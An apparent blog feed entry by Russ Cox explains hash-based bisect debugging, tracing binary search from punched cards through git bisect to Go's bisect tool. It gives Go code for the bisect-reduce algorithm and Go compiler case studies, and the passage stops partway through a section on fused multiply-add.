research!rsc tag:research.swtch.com,2012:research.swtch.com 2024-07-18T10:19:53-04:00 Russ Cox https://swtch.com/~rsc rsc@swtch.com Hash-Based Bisect Debugging in Compilers and Runtimes tag:research.swtch.com,2012:research.swtch.com/bisect 2024-07-18T10:18:53-04:00 2024-07-18T10:20:53-04:00 Binary search over program code or execution to find why a new library or compiler causes a failure. <style> blockquote { padding-left: 0.5em; border-left-style: solid; border-left-width: 4px; border-left-color: #ccf; } </style> <a class=anchor href="#setting_the_stage"><h2 id="setting_the_stage">Setting the Stage</h2></a> <p> Does this sound familiar? You make a change to a library to optimize its performance or clean up technical debt or fix a bug, only to get a bug report: some very large, incomprehensibly opaque test is now failing. Or you add a new compiler optimization with a similar result. Now you have a major debugging job in an unfamiliar code base. <p> What if I told you that a magic wand exists that can pinpoint the relevant line of code or call stack in that unfamiliar code base? It exists. It is a real tool, and I’m going to show it to you. This description might seem a bit over the top, but every time I use this tool, it really does feel like magic. Not just any magic either, but the best kind of magic: delightful to watch even when you know exactly how it works. <a class=anchor href="#binary_search_and_bisecting_data"><h2 id="binary_search_and_bisecting_data">Binary Search and Bisecting Data</h2></a> <p> Before we get to the new trick, let’s take a look at some simpler, older tricks. Every good magician starts with mastery of the basic techniques. In our case, that technique is binary search. Most presentations of binary search talk about finding an item in a sorted list, but there are far more interesting uses. Here is an example I wrote long ago for Go’s <a href="https://go.dev/pkg/sort/#Search"><code>sort.Search</code></a> documentation: <pre>func GuessingGame() { var s string fmt.Printf("Pick an integer from 0 to 100.\n") answer := sort.Search(100, func(i int) bool { fmt.Printf("Is your number &lt;= %d? ", i) fmt.Scanf("%s", &amp;s) return s != "" &amp;&amp; s[0] == 'y' }) fmt.Printf("Your number is %d.\n", answer) } </pre> <p> If we run this code, it plays a guessing game with us: <pre>% go run guess.go Pick an integer from 0 to 100. Is your number &lt;= 50? y Is your number &lt;= 25? n Is your number &lt;= 38? y Is your number &lt;= 32? y Is your number &lt;= 29? n Is your number &lt;= 31? n Your number is 32. % </pre> <p> The same guessing game can be applied to debugging. In his <i>Programming Pearls</i> column titled “Aha! Algorithms” in <i>Communications of the ACM</i> (September 1983), Jon Bentley called binary search “a solution that looks for problems.” Here’s one of his examples:<blockquote> <p> Roy Weil applied the technique [binary search] in cleaning a deck of about a thousand punched cards that contained a single bad card. Unfortunately the bad card wasn’t known by sight; it could only be identified by running some subset of the cards through a program and seeing a wildly erroneous answer—this process took several minutes. His predecessors at the task tried to solve it by running a few cards at a time through the program, and were making steady (but slow) progress toward a solution. How did Weil find the culprit in just ten runs of the program?</blockquote> <p> Obviously, Weil played the guessing game using binary search. Is the bad card in the first 500? Yes.
The first 250? No. And so on. This is the earliest published description of debugging by binary search that I have been able to find. In this case, it was for debugging data. <a class=anchor href="#bisecting_version_history"><h2 id="bisecting_version_history">Bisecting Version History</h2></a> <p> We can apply binary search to a program’s version history instead of data. Every time we notice a new bug in an old program, we play the guessing game “when did this program last work?” <ul> <li> Did it work 50 days ago? Yes. <li> Did it work 25 days ago? No. <li> Did it work 38 days ago? Yes.</ul> <p> And so on, until we find that the program last worked correctly 32 days ago, meaning the bug was introduced 31 days ago. <p> Debugging through time with binary search is a very old trick, independently discovered many times by many people. For example, we could play the guessing game using commands like <code>cvs checkout -D '31 days ago'</code> or Plan 9’s <a href="https://9fans.github.io/plan9port/man/man1/yesterday.html">more musical</a> <code>yesterday -n 31</code>. To some programmers, the techniques of using binary search to debug data or debug through time seem “<a href="https://groups.google.com/g/comp.compilers/c/vGh4s3HBQ-s/m/qmrVKmF5AgAJ">so basic that there is no need to write them down</a>.” But writing a trick down is the first step to making sure everyone can do it: magic tricks can be basic but not obvious. In software, writing a trick down is also the first step to automating it and building good tools. <p> In the late-1990s, the idea of binary search over version history was <a href="https://groups.google.com/g/comp.compilers/c/vGh4s3HBQ-s/m/Chvpu7vTAgAJ">written down at least twice</a>. Brian Ness and Viet Ngo published “<a href="https://ieeexplore.ieee.org/abstract/document/625082">Regression containment through source change isolation</a>” at COMPSAC ’97 (August 1997) describing a system built at Cray Research that they used to deliver much more frequent non-regressing compiler releases. Independently, Larry McVoy published a file “<a href="https://elixir.bootlin.com/linux/1.3.73/source/Documentation/BUG-HUNTING">Documentation/BUG-HUNTING</a>” in the Linux 1.3.73 release (March 1996). He captured how magical it feels that the trick works even if you have no particular expertise in the code being tested:<blockquote> <p> This is how to track down a bug if you know nothing about kernel hacking. It’s a brute force approach but it works pretty well. <br> <br> You need: <ul> <li> A reproducible bug - it has to happen predictably (sorry) <li> All the kernel tar files from a revision that worked to the revision that doesn’t</ul> <p> You will then do: <ul> <li> Rebuild a revision that you believe works, install, and verify that. <li> Do a binary search over the kernels to figure out which one introduced the bug. I.e., suppose 1.3.28 didn’t have the bug, but you know that 1.3.69 does. Pick a kernel in the middle and build that, like 1.3.50. Build &amp; test; if it works, pick the mid point between .50 and .69, else the mid point between .28 and .50. <li> You’ll narrow it down to the kernel that introduced the bug. You can probably do better than this but it gets tricky.</ul> <p> . . . <br> <br> My apologies to Linus and the other kernel hackers for describing this brute force approach, it’s hardly what a kernel hacker would do. However, it does work and it lets non-hackers help bug fix. 
And it is cool because Linux snapshots will let you do this - something that you can’t do with vender supplied releases.</blockquote> <p> Later, Larry McVoy created Bitkeeper, which Linux used as its first source control system. Bitkeeper provided a way to print the longest straight line of changes through the directed acyclic graph of commits, providing a more fine-grained timeline for binary search. When Linus Torvalds created Git, he carried that idea forward as <a href="https://github.com/git/git/commit/8b3a1e056f2107deedfdada86046971c9ad7bb87"><code>git rev-list --bisect</code></a>, which enabled the same kind of manual binary search. A few days after adding it, he <a href="https://groups.google.com/g/fa.linux.kernel/c/N4CqlNCvFCY/m/ItQoFhVZyJgJ">explained how to use it</a> on the Linux kernel mailing list:<blockquote> <p> Hmm.. Since you seem to be a git user, maybe you could try the git "bisect" thing to help narrow down exactly where this happened (and help test that thing too ;). <br> <br> You can basically use git to find the half-way point between a set of "known good" points and a "known bad" point ("bisecting" the set of commits), and doing just a few of those should give us a much better view of where things started going wrong. <br> <br> For example, since you know that 2.6.12-rc3 is good, and 2.6.12 is bad, you’d do <br> <br> git-rev-list --bisect v2.6.12 ^v2.6.12-rc3 <br> <br> where the "v2.6.12 ^v2.6.12-rc3" thing basically means "everything in v2.6.12 but _not_ in v2.6.12-rc3" (that’s what the ^ marks), and the "--bisect" flag just asks git-rev-list to list the middle-most commit, rather than all the commits in between those kernel versions.</blockquote> <p> This response started a <a href="https://groups.google.com/g/fa.linux.kernel/c/cp6abJnEN5U/m/5Z5s14LkzR4J">separate discussion</a> about making the process easier, which led eventually to the <a href="https://git-scm.com/docs/git-bisect"><code>git bisect</code></a> tool that exists today. <p> Here’s an example. We tried updating to a newer version of Go and found that a test fails. We can use <code>git bisect</code> to pinpoint the specific commit that caused the failure: <p> <pre>% git bisect start master go1.21.0 Previous HEAD position was 3b8b550a35 doc: document run.. Switched to branch 'master' Your branch is ahead of 'origin/master' by 5 commits. Bisecting: a merge base must be tested [2639a17f146cc7df0778298c6039156d7ca68202] doc: run rel... % git bisect run sh -c ' git clean -df cd src ./make.bash || exit 125 cd $HOME/src/rsc.io/tmp/timertest/retry go list || exit 0 go test -count=5 ' </pre> <p> It takes some care to write a correct <code>git bisect</code> invocation, but once you get it right, you can walk away while <code>git bisect</code> works its magic. In this case, the script we pass to <code>git bisect run</code> cleans out any stale files and then builds the Go toolchain (<code>./make.bash</code>). If that step fails, it exits with code 125, a special inconclusive answer for <code>git bisect</code>: something else is wrong with this commit and we can’t say whether or not the bug we’re looking for is present. Otherwise it changes into the directory of the failing test. If <code>go list</code> fails, which happens if the bisect uses a version of Go that’s too old, the script exits successfully, indicating that the bug is not present. Otherwise the script runs <code>go test</code> and exits with the status from that command. 
The <code>-count=5</code> is there because this is a flaky failure that does not always happen: running five times is enough to make sure we observe the bug if it is present. <p> When we run this command, <code>git bisect</code> prints a lot of output, along with the output of our test script, to make sure we can see the progress: <pre>% git bisect run ... ... go: download go1.23 for darwin/arm64: toolchain not available Bisecting: 1360 revisions left to test after this (roughly 10 steps) [752379113b7c3e2170f790ec8b26d590defc71d1] runtime/race: update race syso for PPC64LE ... go: download go1.23 for darwin/arm64: toolchain not available Bisecting: 680 revisions left to test after this (roughly 9 steps) [ff8a2c0ad982ed96aeac42f0c825219752e5d2f6] go/types: generate mono.go from types2 source ... ok rsc.io/tmp/timertest/retry 10.142s Bisecting: 340 revisions left to test after this (roughly 8 steps) [97f1b76b4ba3072ab50d0d248fdce56e73b45baf] runtime: optimize timers.cleanHead ... FAIL rsc.io/tmp/timertest/retry 22.136s Bisecting: 169 revisions left to test after this (roughly 7 steps) [80157f4cff014abb418004c0892f4fe48ee8db2e] io: close PipeReader in test ... ok rsc.io/tmp/timertest/retry 10.145s Bisecting: 84 revisions left to test after this (roughly 6 steps) [8f7df2256e271c8d8d170791c6cd90ba9cc69f5e] internal/asan: match runtime.asan{read,write} len parameter type ... FAIL rsc.io/tmp/timertest/retry 20.148s Bisecting: 42 revisions left to test after this (roughly 5 steps) [c9ed561db438ba413ba8cfac0c292a615bda45a8] debug/elf: avoid using binary.Read() in NewFile() ... FAIL rsc.io/tmp/timertest/retry 14.146s Bisecting: 20 revisions left to test after this (roughly 4 steps) [2965dc989530e1f52d80408503be24ad2582871b] runtime: fix lost sleep causing TestZeroTimer flakes ... FAIL rsc.io/tmp/timertest/retry 18.152s Bisecting: 10 revisions left to test after this (roughly 3 steps) [b2e9221089f37400f309637b205f21af7dcb063b] runtime: fix another lock ordering problem ... ok rsc.io/tmp/timertest/retry 10.142s Bisecting: 5 revisions left to test after this (roughly 3 steps) [418e6d559e80e9d53e4a4c94656e8fb4bf72b343] os,internal/godebugs: add missing IncNonDefault calls ... ok rsc.io/tmp/timertest/retry 10.163s Bisecting: 2 revisions left to test after this (roughly 2 steps) [6133c1e4e202af2b2a6d4873d5a28ea3438e5554] internal/trace/v2: support old trace format ... FAIL rsc.io/tmp/timertest/retry 22.164s Bisecting: 0 revisions left to test after this (roughly 1 step) [508bb17edd04479622fad263cd702deac1c49157] time: garbage collect unstopped Tickers and Timers ... FAIL rsc.io/tmp/timertest/retry 16.159s Bisecting: 0 revisions left to test after this (roughly 0 steps) [74a0e3160d969fac27a65cd79a76214f6d1abbf5] time: clean up benchmarks ... ok rsc.io/tmp/timertest/retry 10.147s 508bb17edd04479622fad263cd702deac1c49157 is the first bad commit commit 508bb17edd04479622fad263cd702deac1c49157 Author: Russ Cox &lt;rsc@golang.org&gt; AuthorDate: Wed Feb 14 20:36:47 2024 -0500 Commit: Russ Cox &lt;rsc@golang.org&gt; CommitDate: Wed Mar 13 21:36:04 2024 +0000 time: garbage collect unstopped Tickers and Timers ... This CL adds an undocumented GODEBUG asynctimerchan=1 that will disable the change. The documentation happens in the CL 568341. ... bisect found first bad commit % </pre> <p> This bug appears to be caused by my new garbage-collection-friendly timer implementation that will be in Go 1.23. 
<i>Abracadabra!</i> <a class=anchor href="#new_trick"><h2 id="new_trick">A New Trick: Bisecting Program Locations</h2></a> <p> The culprit commit that <code>git bisect</code> identified is a significant change to the timer implementation. I anticipated that it might cause subtle test failures, so I included a <a href="https://go.dev/doc/godebug">GODEBUG setting</a> to toggle between the old implementation and the new one. Sure enough, toggling it makes the bug disappear: <pre>% GODEBUG=asynctimerchan=1 go test -count=5 # old PASS ok rsc.io/tmp/timertest/retry 10.117s % GODEBUG=asynctimerchan=0 go test -count=5 # new --- FAIL: TestDo (4.00s) ... --- FAIL: TestDo (6.00s) ... --- FAIL: TestDo (4.00s) ... FAIL rsc.io/tmp/timertest/retry 18.133s % </pre> <p> Knowing which commit caused a bug, along with minimal information about the failure, is often enough to help identify the mistake. But what if it’s not? What if the test is large and complicated and entirely code you’ve never seen before, and it fails in some inscrutable way that doesn’t seem to have anything to do with your change? When you work on compilers or low-level libraries, this happens quite often. For that, we have a new magic trick: bisecting program locations. <p> That is, we can run binary search on a different axis: over the <i>program’s code</i>, not its version history. We’ve implemented this search in a new tool unimaginatively named <code>bisect</code>. When applied to library function behavior like the timer change, <code>bisect</code> can search over all stack traces leading to the new code, enabling the new code for some stacks and disabling it for others. By repeated execution, it can narrow the failure down to enabling the code only for one specific stack: <pre>% go install golang.org/x/tools/cmd/bisect@latest % bisect -godebug asynctimerchan=1 go test -count=5 ... bisect: FOUND failing change set --- change set #1 (disabling changes causes failure) internal/godebug.(*Setting).Value() /Users/rsc/go/src/internal/godebug/godebug.go:165 time.syncTimer() /Users/rsc/go/src/time/sleep.go:25 time.NewTimer() /Users/rsc/go/src/time/sleep.go:145 time.After() /Users/rsc/go/src/time/sleep.go:203 rsc.io/tmp/timertest/retry.Do() /Users/rsc/src/rsc.io/tmp/timertest/retry/retry.go:37 rsc.io/tmp/timertest/retry.TestDo() /Users/rsc/src/rsc.io/tmp/timertest/retry/retry_test.go:63 </pre> <p> Here the <code>bisect</code> tool is reporting that disabling <code>asynctimerchan=1</code> (that is, enabling the new implementation) only for this one call stack suffices to provoke the test failure. <p> One of the hardest things about debugging is running a program backward: there’s a data structure with a bad value, or the control flow has zigged instead of zagged, and it’s very difficult to understand how it could have gotten into that state. In contrast, this <code>bisect</code> tool is showing the stack at the moment just <i>before</i> things go wrong: the stack identifies the critical decision point that determines whether the test passes or fails. In contrast to puzzling backward, it is usually easy to look forward in the program execution to understand why this specific decision would matter. Also, in an enormous code base, the bisection has identified the specific few lines where we should start debugging. We can read the code responsible for that specific sequence of calls and look into why the new timers would change the code’s behavior. 
<p> When you are working on a compiler or runtime and cause a test failure in an enormous, unfamiliar code base, and then this <code>bisect</code> tool narrows down the cause to a few specific lines of code, it is truly a magical experience. <p> The rest of this post explains the inner workings of this <code>bisect</code> tool, which Keith Randall, David Chase, and I developed and refined over the past decade of work on Go. Other people and projects have realized the idea of bisecting program locations too: I am not claiming that we were the first to discover it. However, I think we have developed the approach further and systematized it more than others. This post documents what we’ve learned, so that others can build on our efforts rather than rediscover them. <a class=anchor href="#example"><h2 id="example">Example: Bisecting Function Optimization</h2></a> <p> Let’s start with a simple example and work back up to stack traces. Suppose we are working on a compiler and know that a test program fails only when compiled with optimizations enabled. We could make a list of all the functions in the program and then try disabling optimization of functions one at a time until we find a minimal set of functions (probably just one) whose optimization triggers the bug. Unsurprisingly, we can speed up that process using binary search: <ol> <li> Change the compiler to print a list of every function it considers for optimization. <li> Change the compiler to accept a list of functions where optimization is allowed. Passing it an empty list (optimize no functions) should make the test pass, while passing the complete list (optimize all functions) should make the test fail. <li> Use binary search to determine the shortest list prefix that can be passed to the compiler to make the test fail. The last function in that list prefix is one that must be optimized for the test to fail (but perhaps not the only one). <li> Forcing that function to always be optimized, we can repeat the process to find any other functions that must also be optimized to provoke the bug.</ol> <p> For example, suppose there are ten functions in the program and we run these three binary search trials: <p> <img name="hashbisect0func" class="center pad" width=197 height=238 src="hashbisect0func.png" srcset="hashbisect0func.png 1x, hashbisect0func@1.5x.png 1.5x, hashbisect0func@2x.png 2x, hashbisect0func@3x.png 3x, hashbisect0func@4x.png 4x"> <p> When we optimize the first 5 functions, the test passes. 7? fail. 6? still pass. This tells us that the seventh function, <code>sin</code>, is one function that must be optimized to provoke the failure. More precisely, with <code>sin</code> optimized, we know that no functions later in the list need to be optimized, but we don’t know whether any of the functions earlier in the list must also be optimized. To check the earlier locations, we can run another binary search over the remaining six list entries, always adding <code>sin</code> as well: <p> <img name="hashbisect0funcstep2" class="center pad" width=218 height=180 src="hashbisect0funcstep2.png" srcset="hashbisect0funcstep2.png 1x, hashbisect0funcstep2@1.5x.png 1.5x, hashbisect0funcstep2@2x.png 2x, hashbisect0funcstep2@3x.png 3x, hashbisect0funcstep2@4x.png 4x"> <p> This time, optimizing the first two (plus the hard-wired <code>sin</code>) fails, but optimizing the first one passes, indicating that <code>cos</code> must also be optimized. Then we have just one suspect location left: <code>add</code>.
A binary search over that one-entry list (plus the two hard-wired <code>cos</code> and <code>sin</code>) shows that <code>add</code> can be left off the list without losing the failure. <p> Now we know the answer: one locally minimal set of functions to optimize to cause the test failure is <code>cos</code> and <code>sin</code>. By locally minimal, I mean that removing any function from the set makes the test failure disappear: optimizing <code>cos</code> or <code>sin</code> by itself is not enough. However, the set may still not be globally minimal: perhaps optimizing only <code>tan</code> would cause a different failure (or not). <p> It might be tempting to run the search more like a traditional binary search, cutting the list being searched in half at each step. That is, after confirming that the program passes when optimizing the first half, we might consider discarding that half of the list and continuing the binary search on the other half. Applied to our example, that algorithm would run like this: <p> <img name="hashbisect0funcbad" class="center pad" width=290 height=237 src="hashbisect0funcbad.png" srcset="hashbisect0funcbad.png 1x, hashbisect0funcbad@1.5x.png 1.5x, hashbisect0funcbad@2x.png 2x, hashbisect0funcbad@3x.png 3x, hashbisect0funcbad@4x.png 4x"> <p> The first trial passing would suggest the incorrect optimization is in the second half of the list, so we discard the first half. But now <code>cos</code> is never optimized (it just got discarded), so all future trials pass too, leading to a contradiction: we lost track of the way to make the program fail. The problem is that discarding part of the list is only justified if we know that part doesn’t matter. That’s only true if the bug is caused by optimizing a single function, which may be likely but is not guaranteed. If the bug only manifests when optimizing multiple functions at once, discarding half the list discards the failure. That’s why the binary search must in general be over list prefix lengths, not list subsections. <a class=anchor href="#bisect-reduce"><h2 id="bisect-reduce">Bisect-Reduce</h2></a> <p> The “repeated binary search” algorithm we just looked at does work, but the need for the repetition suggests that binary search may not be the right core algorithm. Here is a more direct algorithm, which I’ll call the “bisect-reduce” algorithm, since it is a bisection-based reduction. <p> For simplicity, let’s assume we have a global function <code>buggy</code> that reports whether the bug is triggered when our change is enabled at the given list of locations: <pre>// buggy reports whether the bug is triggered // by enabling the change at the listed locations. func buggy(locations []string) bool </pre> <p> <code>BisectReduce</code> takes a single input list <code>targets</code> for which <code>buggy(targets)</code> is true and returns a locally minimal subset <code>x</code> for which <code>buggy(x)</code> remains true. It invokes a more generalized helper <code>bisect</code>, which takes an additional argument: a <code>forced</code> list of locations to keep enabled during the reduction. <pre>// BisectReduce returns a locally minimal subset x of targets // where buggy(x) is true, assuming that buggy(targets) is true. func BisectReduce(targets []string) []string { return bisect(targets, []string{}) } // bisect returns a locally minimal subset x of targets // where buggy(x+forced) is true, assuming that // buggy(targets+forced) is true. // // Precondition: buggy(targets+forced) = true. 
// // Postcondition: buggy(result+forced) = true, // and buggy(x+forced) = false for any x ⊂ result. func bisect(targets []string, forced []string) []string { if len(targets) == 0 || buggy(forced) { // Targets are not needed at all. return []string{} } if len(targets) == 1 { // Reduced list to a single required entry. return []string{targets[0]} } // Split targets in half and reduce each side separately. m := len(targets)/2 left, right := targets[:m], targets[m:] leftReduced := bisect(left, slices.Concat(right, forced)) rightReduced := bisect(right, slices.Concat(leftReduced, forced)) return slices.Concat(leftReduced, rightReduced) } </pre> <p> Like any good divide-and-conquer algorithm, a few lines do quite a lot: <ul> <li> <p> If the target list has been reduced to nothing, or if <code>buggy(forced)</code> (without any targets) is true, then we can return an empty list. Otherwise we know something from targets is needed. <li> <p> If the target list is a single entry, that entry is what’s needed: we can return a single-element list. <li> <p> Otherwise, the recursive case: split the target list in half and reduce each side separately. Note that it is important to force <code>leftReduced</code> (not <code>left</code>) while reducing <code>right</code>.</ul> <p> Applied to the function optimization example, <code>BisectReduce</code> would end up at a call to <pre>bisect([add cos div exp mod mul sin sqr sub tan], []) </pre> <p> which would split the targets list into <pre>left = [add cos div exp mod] right = [mul sin sqr sub tan] </pre> <p> The recursive calls compute: <pre>bisect([add cos div exp mod], [mul sin sqr sub tan]) = [cos] bisect([mul sin sqr sub tan], [cos]) = [sin] </pre> <p> Then the <code>return</code> puts the two halves together: <code>[cos sin]</code>. <p> The version of <code>BisectReduce</code> we have been considering is the shortest one I know; let’s call it the “short algorithm”. A longer version handles the “easy” case of the bug being contained in one half before the “hard” one of needing parts of both halves. Let’s call it the “easy/hard algorithm”: <pre>// BisectReduce returns a locally minimal subset x of targets // where buggy(x) is true, assuming that buggy(targets) is true. func BisectReduce(targets []string) []string { if len(targets) == 0 || buggy(nil) { return nil } return bisect(targets, []string{}) } // bisect returns a locally minimal subset x of targets // where buggy(x+forced) is true, assuming that // buggy(targets+forced) is true. // // Precondition: buggy(targets+forced) = true, // and buggy(forced) = false. // // Postcondition: buggy(result+forced) = true, // and buggy(x+forced) = false for any x ⊂ result. // Also, if there are any valid single-element results, // then bisect returns one of them. func bisect(targets []string, forced []string) []string { if len(targets) == 1 { // Reduced list to a single required entry. return []string{targets[0]} } // Split targets in half. m := len(targets)/2 left, right := targets[:m], targets[m:] // If either half is sufficient by itself, focus there. if buggy(slices.Concat(left, forced)) { return bisect(left, forced) } if buggy(slices.Concat(right, forced)) { return bisect(right, forced) } // Otherwise need parts of both halves. leftReduced := bisect(left, slices.Concat(right, forced)) rightReduced := bisect(right, slices.Concat(leftReduced, forced)) return slices.Concat(leftReduced, rightReduced) } </pre> <p> The easy/hard algorithm has two benefits and one drawback compared to the short algorithm. 
<p> One benefit is that the easy/hard algorithm more directly maps to our intuitions about what bisecting should do: try one side, try the other, fall back to some combination of both sides. In contrast, the short algorithm always relies on the general case and is harder to understand. <p> Another benefit of the easy/hard algorithm is that it guarantees to find a single-culprit answer when one exists. Since most bugs can be reduced to a single culprit, guaranteeing to find one when one exists makes for easier debugging sessions. Supposing that optimizing <code>tan</code> would have triggered the test failure, the easy/hard algorithm would try <pre>buggy([add cos div exp mod]) = false // left buggy([mul sin sqr sub tan]) = true // right </pre> <p> and then would discard the left side, focusing on the right side and eventually finding <code>[tan]</code>, instead of <code>[sin cos]</code>. <p> The drawback is that because the easy/hard algorithm doesn’t often rely on the general case, the general case needs more careful testing and is easier to get wrong without noticing. For example, Andreas Zeller’s 1999 paper “<a href="https://dl.acm.org/doi/10.1145/318774.318946">Yesterday, my program worked. Today, it does not. Why?</a>” gives what should be the easy/hard version of the bisect-reduce algorithm as a way to bisect over independent program changes, except that the algorithm has a bug: in the “hard” case, the <code>right</code> bisection forces <code>left</code> instead of <code>leftReduced</code>. The result is that if there are two culprit pairs crossing the <code>left</code>/<code>right</code> boundary, the reductions can choose one culprit from each pair instead of a matched pair. Simple test cases are all handled by the easy case, masking the bug. In contrast, if we insert the same bug into the general case of the short algorithm, very simple test cases fail. <p> Real implementations are better served by the easy/hard algorithm, but they must take care to implement it correctly. <a class=anchor href="#list-based_bisect-reduce"><h2 id="list-based_bisect-reduce">List-Based Bisect-Reduce</h2></a> <p> Having established the algorithm, let’s now turn to the details of hooking it up to a compiler. Exactly how do we obtain the list of source locations, and how do we feed it back into the compiler? <p> The most direct answer is to implement one debug mode that prints the full list of locations for the optimization in question and another debug mode that accepts a list indicating where the optimization is permitted. <a href="https://bernsteinbear.com/blog/cinder-jit-bisect/">Meta’s Cinder JIT for Python</a>, published in 2021, takes this approach for deciding which functions to compile with the JIT (as opposed to interpret). Its <a href="https://github.com/facebookincubator/cinder/blob/cinder/3.10/Tools/scripts/jitlist_bisect.py"><code>Tools/scripts/jitlist_bisect.py</code></a> is the earliest correct published version of the bisect-reduce algorithm that I’m aware of, using the easy/hard form. <p> The only downside to this approach is the potential size of the lists, especially since bisect debugging is critical for reducing failures in very large programs. If there is some way to reduce the amount of data that must be sent back to the compiler on each iteration, that would be helpful. 
In complex build systems, the function lists may be too large to pass on the command line or in an environment variable, and it may be difficult or even impossible to arrange for a new input file to be passed to every compiler invocation. An approach that can specify the target list as a short command line argument will be easier to use in practice. <a class=anchor href="#counter-based_bisect-reduce"><h2 id="counter-based_bisect-reduce">Counter-Based Bisect-Reduce</h2></a> <p> Java’s HotSpot C2 just-in-time (JIT) compiler provided a debug mechanism to control which functions to compile with the JIT, but instead of using an explicit list of functions like in Cinder, HotSpot numbered the functions as it considered them. The compiler flags <code>-XX:CIStart</code> and <code>-XX:CIStop</code> set the range of function numbers that were eligible to be compiled. Those flags are <a href="https://github.com/openjdk/jdk/blob/151ef5d4d261c9fc740d3ccd64a70d3b9ccc1ab5/src/hotspot/share/compiler/compileBroker.cpp#L1569">still present today (in debug builds)</a>, and you can find uses of them in <a href="https://bugs.java.com/bugdatabase/view_bug?bug_id=4311720">Java bug reports dating back at least to early 2000</a>. <p> There are at least two limitations to numbering functions. <p> The first limitation is minor and easily fixed: allowing only a single contiguous range enables binary search for a single culprit but not the general bisect-reduce for multiple culprits. To enable bisect-reduce, it would suffice to accept a list of integer ranges, like <code>-XX:CIAllow=1-5,7-10,12,15</code>. <p> The second limitation is more serious: it can be difficult to keep the numbering stable from run to run. Implementation strategies like compiling functions in parallel might mean considering functions in varying orders based on thread interleaving. In the context of a JIT, even threaded runtime execution might change the order that functions are considered for compilation. Twenty-five years ago, threads were rarely used and this limitation may not have been much of a problem. Today, assuming a consistent function numbering is a show-stopper. <a class=anchor href="#hash-based_bisect-reduce"><h2 id="hash-based_bisect-reduce">Hash-Based Bisect-Reduce</h2></a> <p> A different way to keep the location list implicit is to hash each location to a (random-looking) integer and then use bit suffixes to identify sets of locations. The hash computation does not depend on the sequence in which the source locations are encountered, making hashing compatible with parallel compilation, thread interleaving, and so on. The hashes effectively arrange the functions into a binary tree: <p> <img name="hashbisect1" class="center pad" width=817 height=411 src="hashbisect1.png" srcset="hashbisect1.png 1x, hashbisect1@1.5x.png 1.5x, hashbisect1@2x.png 2x, hashbisect1@3x.png 3x"> <p> Looking for a single culprit is a basic walk down the tree. Even better, the general bisect-reduce algorithm is easily adapted to hash suffix patterns. First we have to adjust the definition of <code>buggy</code>: we need it to tell us the number of matches for the suffix we are considering, so we know whether we can stop reducing the case: <pre>// buggy reports whether the bug is triggered // by enabling the change at the locations with // hashes ending in suffix or any of the extra suffixes. // It also returns the number of locations found that // end in suffix (only suffix, ignoring extra). 
func buggy(suffix string, extra []string) (fail bool, n int) </pre> <p> Now we can translate the easy/hard algorithm more or less directly: <pre>// BisectReduce returns a locally minimal list of hash suffixes, // each of which uniquely identifies a single location hash, // such that buggy("none", list) = true. func BisectReduce() []string { if fail, _ := buggy("none", nil); fail { return nil } return bisect("", []string{}) } // bisect returns a locally minimal list of hash suffixes, // each of which uniquely identifies a single location hash, // and all of which end in suffix, // such that buggy(result+forced) = true. // // Precondition: buggy(suffix, forced) = true, _. // and buggy("none", forced) = false, 0. // // Postcondition: buggy("none", result+forced) = true, 0; // each suffix in result matches a single location hash; // and buggy("none", x+forced) = false for any x ⊂ result. // Also, if there are any valid single-element results, // then bisect returns one of them. func bisect(suffix string, forced []string) []string { if _, n := buggy(suffix, forced); n == 1 { // Reduced list to a single required entry. return []string{suffix} } // If either of 0suffix or 1suffix is sufficient // by itself, focus there. if fail, _ := buggy("0"+suffix, forced); fail { return bisect("0"+suffix, forced) } if fail, _ := buggy("1"+suffix, forced); fail { return bisect("1"+suffix, forced) } // Otherwise matches from both extensions are needed. leftReduced := bisect("0"+suffix, slices.Concat([]string{"1"+suffix}, forced)) rightReduced := bisect("1"+suffix, slices.Concat(leftReduced, forced)) return slices.Concat(leftReduced, rightReduced) } </pre> <p> Careful readers might note that in the easy cases, the recursive call to <code>bisect</code> starts by repeating the same call to <code>buggy</code> that the caller did, this time to count the number of matches for the suffix in question. An efficient implementation could pass the result of that run to the recursive call, avoiding redundant trials. <p> In this version, <code>bisect</code> does not guarantee to cut the search space in half at each level of the recursion. Instead, the randomness of the hashes means that it cuts the search space roughly in half on average. That’s still enough for logarithmic behavior when there are just a few culprits. The algorithm would also work correctly if the suffixes were applied to match a consistent sequential numbering instead of hashes; the only problem is obtaining the numbering. <p> The hash suffixes are about as short as the function number ranges and easily passed on the command line. For example, a hypothetical Java compiler could use <code>-XX:CIAllowHash=000,10,111</code>. <a class=anchor href="#use_case"><h2 id="use_case">Use Case: Function Selection</h2></a> <p> The earliest use of hash-based bisect-reduce in Go was for selecting functions, as in the example we’ve been considering. In 2015, Keith Randall was working on a new SSA backend for the Go compiler. The old and new backends coexisted, and the compiler could use either for any given function in the program being compiled.
Keith introduced an <a href="https://go.googlesource.com/go/+/e3869a6b65bb0f95dac7eca3d86055160b12589f">environment variable GOSSAHASH</a> that specified the last few binary digits of the hash of function names that should use the new backend: GOSSAHASH=0110 meant “compile only those functions whose names hash to a value with last four bits 0110.” When a test was failing with the new backend, a person debugging the test case tried GOSSAHASH=0 and GOSSAHASH=1 and then used binary search to progressively refine the pattern, narrowing the failure down until only a single function was being compiled with the new backend. This was invaluable for approaching failures in large real-world tests (tests for libraries or production code, not for the compiler) that we had not written and did not understand. The approach assumed that the failure could always be reduced to a single culprit function. <p> It is fascinating that HotSpot, Cinder, and Go all hit upon the idea of binary search to find miscompiled functions in a compiler, and yet all three used different selection mechanisms (counters, function lists, and hashes). <a class=anchor href="#use_case"><h2 id="use_case">Use Case: SSA Rewrite Selection</h2></a> <p> In late 2016, David Chase was debugging a new optimizer rewrite rule that should have been correct but was causing mysterious test failures. He <a href="https://go-review.googlesource.com/29273">reused the same technique</a> but at finer granularity: the bit pattern now controlled which functions that rewrite rule could be used in. <p> David also wrote the <a href="https://github.com/dr2chase/gossahash/tree/e0bba144af8b1cc8325650ea8fbe3a5c946eb138">initial version of a tool, <code>gossahash</code></a>, for taking on the job of binary search. Although <code>gossahash</code> only looked for a single culprit, it was remarkably helpful. It served for many years and eventually became <code>bisect</code>. <a class=anchor href="#use_case"><h2 id="use_case">Use Case: Fused Multiply-Add</h2></a> <p> Having a tool available, instead of needing to bisect manually, made us keep finding problems we could solve. In 2022, another presented itself. We had updated the Go compiler to use floating-point fused multiply-add (FMA) instructions on a new architecture, and some tests were failing. By making the FMA rewrite conditional on a suffix of a hash that included the current file name and line number, we could apply bisect-reduce to identify the specific line in the source code where an FMA instruction broke the test. <p> For example, this bisection finds that <code>b.go:7</code> is the culprit line: <p> <img name="hashbisect0" class="center pad" width=254 